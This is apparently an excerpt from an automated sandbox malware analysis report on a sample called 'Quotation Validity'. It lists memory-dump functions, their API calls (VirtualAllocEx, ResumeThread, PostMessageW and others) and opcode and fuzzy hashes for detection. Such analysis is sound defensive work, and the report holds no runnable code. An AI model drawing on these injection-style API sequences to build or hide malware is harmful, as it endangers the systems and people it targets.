                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                • Opcode ID: 172d6aa6307bd6997aa052c95d0617f09b505dc17a3d5bf636aca18a112cfc44
                                                                                • Instruction ID: da46258c819ab69b9c6330dd5ed082046becc30e3f8b63fd2127e17c29e52c34
                                                                                • Opcode Fuzzy Hash: 172d6aa6307bd6997aa052c95d0617f09b505dc17a3d5bf636aca18a112cfc44
                                                                                • Instruction Fuzzy Hash: 3D116AB580034D9FDB10CF9AD844BDEBFF8EB48310F14841AE914A7210C375A950CFA4
                                                                                Function 078A9828 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078A9896
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 3261f553647353bec249c3e331e19f51a4bc2f49c2a466d07ea4d68b7f441b04
                                                                                • Instruction ID: 8aa6f29e5902aa5f5b9667823382a2a5bc20b3920ed7aeb89e1e68a4b3cf5d6f
                                                                                • Opcode Fuzzy Hash: 3261f553647353bec249c3e331e19f51a4bc2f49c2a466d07ea4d68b7f441b04
                                                                                • Instruction Fuzzy Hash: C91126B69003499FDB20DFAAC844BDEBBF5EF48320F248819E915A7250C775A954CBA0
                                                                                Function 078A9821 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078A9896
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 84f1d91342f3ee147a142e35288180497210a1a3138bda1e0886e7e716ebf59a
                                                                                • Instruction ID: d650c5f30842fbbd8d49407f14cb9f515e373737d216368ddd20c62f3cdeec65
                                                                                • Opcode Fuzzy Hash: 84f1d91342f3ee147a142e35288180497210a1a3138bda1e0886e7e716ebf59a
                                                                                • Instruction Fuzzy Hash: CA1147B6D003499FDB20DFA9C844BDEBBF5EF48320F14881AD519A7250C7759550CBA0
                                                                                Function 078A9268 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 26203d7eff937ed042d04fef274c9a6485169d58b5680864f9bf05e3a63f03b9
                                                                                • Instruction ID: 97ab3b859c37af869dd28e671cf07cbc7716d7073f55edde60682862c9f52768
                                                                                • Opcode Fuzzy Hash: 26203d7eff937ed042d04fef274c9a6485169d58b5680864f9bf05e3a63f03b9
                                                                                • Instruction Fuzzy Hash: 811166B1D043498FDB20DFAAC4457EEFBF5EF88320F248819C519A7240CB79A944CBA4
                                                                                Function 078A9260 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 6d338f76118a9728dbea41ce3cafcf0b1a842e105443a81dd9ba52c9c9a1bcf2
                                                                                • Instruction ID: f79e28080f9f6b785905e59a940fad99adf76a70af10a88a3ef1ac2c48cb9fb1
                                                                                • Opcode Fuzzy Hash: 6d338f76118a9728dbea41ce3cafcf0b1a842e105443a81dd9ba52c9c9a1bcf2
                                                                                • Instruction Fuzzy Hash: 151158B5D003598FDB20DFAAC4457EEBBF5AF88224F24882AC519A7240C779A545CB94
                                                                                Function 0182B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0182B51E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 6a94480a4a7cb590ac9ff95aaf7b356763c0a53012d5442762e25bcc36a5bb36
                                                                                • Instruction ID: 8c5a037301b9ee512a05bc5840d5ad1de4ccde61dc8b259ec7af3e1679a6aa1a
                                                                                • Opcode Fuzzy Hash: 6a94480a4a7cb590ac9ff95aaf7b356763c0a53012d5442762e25bcc36a5bb36
                                                                                • Instruction Fuzzy Hash: E5110FB6C012598FDB20CF9AD444BDEFBF4AF88314F14842AD929A7200D375A645CFA1
                                                                                Function 078A6428 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 078ABED5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 0c38999da9836a66d13c1a539f2af90a83b1eca40eb3c22009fab669ece85269
                                                                                • Instruction ID: 7aa73862489f1a74356865fa7c59da50cdadfc811d3b8cd2f03b2c14c4c00235
                                                                                • Opcode Fuzzy Hash: 0c38999da9836a66d13c1a539f2af90a83b1eca40eb3c22009fab669ece85269
                                                                                • Instruction Fuzzy Hash: 6311F5B5900349AFDB20DF9AC445BEEBFF8EB58314F108419E914A7200D375A954CFA5
                                                                                Function 078ABE71 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 078ABED5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: c821bbe10f00da09e352cba82e8be5f2a65b4a1e90c015ffbc8574d8648ecad5
                                                                                • Instruction ID: 850336ba928a1e403054e70c9d80a711815473f1e9020183d193ce0c59de4480
                                                                                • Opcode Fuzzy Hash: c821bbe10f00da09e352cba82e8be5f2a65b4a1e90c015ffbc8574d8648ecad5
                                                                                • Instruction Fuzzy Hash: 0F1103B9800349DFDB20CF99C585BDEBBF4FB18310F10881AD518A7210D375A594CFA1
                                                                                Function 082E412C Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,082E6371,?,?), ref: 082E6518
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: de06b0df637a148638dfc63a8eb96309fa3db3ee1c1792a618ab13df2d4952fe
                                                                                • Instruction ID: 1a83c443e22e987aceb8e369756cc45bd0ae5e46dfcd5bea8d085323e7d76070
                                                                                • Opcode Fuzzy Hash: de06b0df637a148638dfc63a8eb96309fa3db3ee1c1792a618ab13df2d4952fe
                                                                                • Instruction Fuzzy Hash: AC1136B59003498FDB20DF9AC545BEEFBF4EB58324F20841AE958A7340D379A944CFA5
                                                                                Function 082E64B9 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,082E6371,?,?), ref: 082E6518
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 3c4eb0fa53147c879ae9531efbc207ee2928773340b3a5f67818ac539227e1fd
                                                                                • Instruction ID: 8ffba335cff657cf521cb723236287369109651f7c455c4b8feb751d554b44b0
                                                                                • Opcode Fuzzy Hash: 3c4eb0fa53147c879ae9531efbc207ee2928773340b3a5f67818ac539227e1fd
                                                                                • Instruction Fuzzy Hash: B51148B69003498FDB20DF9AC545BDEBBF4EB48320F248419E958A7340C378A944CFA5
                                                                                Function 0158D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301400862.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_158d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8b7e098a385fbb8424108b402d5c96c089892dcba0dfd9c6b19b8690760732e2
                                                                                • Instruction ID: aa6b6b86aa2135d1bfa3802d5cd89aed9ea47e89524d4206892cfd637cccdf6c
                                                                                • Opcode Fuzzy Hash: 8b7e098a385fbb8424108b402d5c96c089892dcba0dfd9c6b19b8690760732e2
                                                                                • Instruction Fuzzy Hash: C4214B71500204DFDB05EF48D5C0B5ABBF5FB84324F24C56DD9091F2A6C376E446CAA1
                                                                                Function 0158D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301400862.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_158d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3fd5243c173595bd70a9d5f2e13ef81c19ba1280b5531cc1d5f4715c79fa471
                                                                                • Instruction ID: 4a5b2f39b7c3ef2800a8754e0b36c432b57c6fcaa289295fff3dee799a8cf433
                                                                                • Opcode Fuzzy Hash: d3fd5243c173595bd70a9d5f2e13ef81c19ba1280b5531cc1d5f4715c79fa471
                                                                                • Instruction Fuzzy Hash: FA21F4B1504240DFDB15EF54D9C0B2ABBF5FB84218F24C56AD9051E296C336D456CAB2
                                                                                Function 0159D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301462710.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_159d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5a4635b8e3b9c3505904472b38e4b49df6d476bdd1419258dfac42ee7301920a
                                                                                • Instruction ID: 7c8e540265c69c94517a6070a120c37bb3cb51cbbcc57deed8c67bc571e331b4
                                                                                • Opcode Fuzzy Hash: 5a4635b8e3b9c3505904472b38e4b49df6d476bdd1419258dfac42ee7301920a
                                                                                • Instruction Fuzzy Hash: 6E21FF75604204DFDF15DF64D880B2ABBB5FB84254F24C969D80A0F246D33AD846CA62
                                                                                Function 0159D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301462710.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_159d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 54a144d1938f8523d90247539fd1103edd6589436b0fad9b0e10fb141f3d6078
                                                                                • Instruction ID: 68c63dc1f48d4d340577ecdc7c44c743129ebfb16e345e0173c77779d8a704ff
                                                                                • Opcode Fuzzy Hash: 54a144d1938f8523d90247539fd1103edd6589436b0fad9b0e10fb141f3d6078
                                                                                • Instruction Fuzzy Hash: E321D3B5504204DFDF05DF94D580B29BBB5FB84224F24C9ADD90A4F296C33AD446CA62
                                                                                Function 0159D006 Relevance: .1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301462710.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_159d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2b4d965dcb7c1ba960d4aec455774ca03523128e7d7941d652c059f740befa2d
                                                                                • Instruction ID: 6bbda207f9d38b3f231315d8c59251574bcb239fba15af989880795dd7444f67
                                                                                • Opcode Fuzzy Hash: 2b4d965dcb7c1ba960d4aec455774ca03523128e7d7941d652c059f740befa2d
                                                                                • Instruction Fuzzy Hash: 4D219D755093808FDB13CF64D990B15BF71FB46214F28C5EAD8498F6A7C33A980ACB62
                                                                                Function 0158D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301400862.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_158d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                • Instruction ID: 9db30b901d462042263e82b591a3f4693bee44f51180b96a4f1aaffbebc836bb
                                                                                • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                • Instruction Fuzzy Hash: 2711CD76504240DFDB12DF48D5C0B5ABFB1FB84224F2482A9D8091E666C37AE45ACBA1
                                                                                Function 0158D4BF Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301400862.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_158d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                • Instruction ID: df84d5ecdb5ee13539c9eae414c5f16f258d537c83ebe7439c9d753178119cff
                                                                                • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                • Instruction Fuzzy Hash: F911DF76504280CFCB12DF54D5C0B1ABFB1FB84314F24C6AAD8491F656C33AD456CBA1
                                                                                Function 0159D1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301462710.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_159d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                • Instruction ID: 85120e8dbb58132e37d7ae6a2ab90683316cfdca75876a9743d9904014fce4d7
                                                                                • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                • Instruction Fuzzy Hash: B9118B75504280DFDF16CF54D5C4B19BBB1FB84224F28C6AAD8494F696C33AD44ACB62
                                                                                Function 0158D731 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301400862.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_158d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c022e3281fc61e1436a90cee436d52ff4921396ca3f6a326b9cd599046c66564
                                                                                • Instruction ID: e2658f500f39482b51da738bca5560ce059568a5341dd5802fe1a488bf5a19ec
                                                                                • Opcode Fuzzy Hash: c022e3281fc61e1436a90cee436d52ff4921396ca3f6a326b9cd599046c66564
                                                                                • Instruction Fuzzy Hash: C501A7715053849BF7107E65CD8476ABBF8FF41264F18C81AED099E1C2D6799840CAB2
                                                                                Function 0158D730 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1301400862.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_158d000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d0df9a8ca21854f8d6a53fa6702464da956bb976346d1702a8238747a6c20806
                                                                                • Instruction ID: 231b0483e42a6b461b3a564628886a10f02f8f492388a53a67252a5403df990c
                                                                                • Opcode Fuzzy Hash: d0df9a8ca21854f8d6a53fa6702464da956bb976346d1702a8238747a6c20806
                                                                                • Instruction Fuzzy Hash: B2F06272505384AFE7209E19C984B66FFE8EB81634F28C55AED485F286C2799844CA71

                                                                                Non-executed Functions

                                                                                Function 078A9318 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dPT
                                                                                • API String ID: 0-719868170
                                                                                • Opcode ID: 43810bc3ebf877ac8a60c960946927be0ccde3b86746e7c4c848700a93deddea
                                                                                • Instruction ID: 5a3a6fa9f35ab5d1bc95e933e2bb946a3c1280580de1b8e990b3385bd83c9c1e
                                                                                • Opcode Fuzzy Hash: 43810bc3ebf877ac8a60c960946927be0ccde3b86746e7c4c848700a93deddea
                                                                                • Instruction Fuzzy Hash: 7FE1D4B4E142199FEB14CFA9C580AAEBBF2FF89304F248169D414AB355D735AD41CFA0
                                                                                Function 078AE0C8 Relevance: .4, Instructions: 375COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 717d54ffacf42eb2a60b2e7ef8a6664114cfba2ea8a4061cf77660cb49ed2a37
                                                                                • Instruction ID: e942fe74c3016f1539fb5370fd5636f6bec93592606766c58c7250cdbce56baf
                                                                                • Opcode Fuzzy Hash: 717d54ffacf42eb2a60b2e7ef8a6664114cfba2ea8a4061cf77660cb49ed2a37
                                                                                • Instruction Fuzzy Hash: CDD1CBB0B00615AFEB19DF79C450BAEB7F6AF99700F1448ADD146CB690CB34E941CB62
                                                                                Function 032D0130 Relevance: .3, Instructions: 315COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 71c282a856a100997589eb6db2b511b8aaf8bb52946e8325a9156434f24e3e1f
                                                                                • Instruction ID: cdd722a71dd1ea5bd0e6586ec03e77549ae5ccb8dc8f69ac0329bd9452290d86
                                                                                • Opcode Fuzzy Hash: 71c282a856a100997589eb6db2b511b8aaf8bb52946e8325a9156434f24e3e1f
                                                                                • Instruction Fuzzy Hash: CB1285B84017458BE330CF65E94C28D7BB1BB85728F504329D2A16B6E9DFB8164BCF48
                                                                                Function 078A7748 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7e8c2d03758082e37dba2c3f6bca9606082f6f9a9bf0a10d472f404600496e5
                                                                                • Instruction ID: 4e5a1dfe5ad7d68bdf8a4a050c467b34fc117b07a72720fbd9b1873ed4907d0f
                                                                                • Opcode Fuzzy Hash: f7e8c2d03758082e37dba2c3f6bca9606082f6f9a9bf0a10d472f404600496e5
                                                                                • Instruction Fuzzy Hash: 2CE1D8B4E102199FDB14DFA9C580AAEBBF2FF89304F248169D414AB355D734AD41CF60
                                                                                Function 078A7310 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8fdc3ccf5c02e8e6cc3b64a60f851ac0b36f3466d5bd43131823f012d3a12a60
                                                                                • Instruction ID: e95664e10e04e6e8a2ad78039912bac56183507375d46555bd6652fd5cb2b9ac
                                                                                • Opcode Fuzzy Hash: 8fdc3ccf5c02e8e6cc3b64a60f851ac0b36f3466d5bd43131823f012d3a12a60
                                                                                • Instruction Fuzzy Hash: 9FE1F6B4E106199FEB14CFA9C580AAEBBF2FF89304F248169D414AB355D735AD41CFA0
                                                                                Function 078A6ED8 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2c6632fe3210ddce996ec80cc17b43d9f98359586246d3e8180a45913d2a6414
                                                                                • Instruction ID: 7ed9f010f1733b4030c9654b38e8544b6e00d3428c218bdc61433c8767e459b7
                                                                                • Opcode Fuzzy Hash: 2c6632fe3210ddce996ec80cc17b43d9f98359586246d3e8180a45913d2a6414
                                                                                • Instruction Fuzzy Hash: 7EE1E8B4E102199FEB14CFA9C580AAEBBF2FF89304F248169E415AB355D735AD41CF60
                                                                                Function 078A7B80 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0a157c27ca93ac9be42afae0fa1b25285ad7b1bc8434214edb24fcc34621eb4
                                                                                • Instruction ID: d06809271b25455bd78069878056aef31d6cf7dbeae78821703ecc344f8600a4
                                                                                • Opcode Fuzzy Hash: a0a157c27ca93ac9be42afae0fa1b25285ad7b1bc8434214edb24fcc34621eb4
                                                                                • Instruction Fuzzy Hash: 7FE1F8B4E106199FEB14CFA9C580AAEBBF2FF89304F248169E414AB355D735AD41CF60
                                                                                Function 032DE9C8 Relevance: .3, Instructions: 269COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c21304a40b06f90a2c80aa1641e5aa1d35cfe610ff0cd8bab3e2096ef656fdc
                                                                                • Instruction ID: e6f259bbcc54a87f3162435d34c36ac19abe423f3e321d41b45879dbb23e79d1
                                                                                • Opcode Fuzzy Hash: 9c21304a40b06f90a2c80aa1641e5aa1d35cfe610ff0cd8bab3e2096ef656fdc
                                                                                • Instruction Fuzzy Hash: BFD1093182075A8ADB10EB64D9906ADB7B1FF96300F50C79AD5497B220EFB0AEC5CF51
                                                                                Function 0182E094 Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be99c023d23cbee5531a1dce5b1119a69a8afeda9a0a6ae3dba9b4d5eb6c7afe
                                                                                • Instruction ID: 3796891a44821b56e283e4764a17be46b3cf09f88fa95b5e705827663208a843
                                                                                • Opcode Fuzzy Hash: be99c023d23cbee5531a1dce5b1119a69a8afeda9a0a6ae3dba9b4d5eb6c7afe
                                                                                • Instruction Fuzzy Hash: F7A18F36E0062A8FCF16DFB8C8405DEB7B2FF85301B24456AE901EB265DB71DA85CB40
                                                                                Function 032DE9D8 Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d91134a0fd6543ccd62219ddff253235f28423ec806c018596bf8917d064c4f2
                                                                                • Instruction ID: b452ed1af3ee792d70875e51f71656421f120961088ad04bc995ab601110348e
                                                                                • Opcode Fuzzy Hash: d91134a0fd6543ccd62219ddff253235f28423ec806c018596bf8917d064c4f2
                                                                                • Instruction Fuzzy Hash: 4BD1093182075A8ADB10EB64D99069DB7B1FF96300F50C79AD5497B220EFB0AEC5CF51
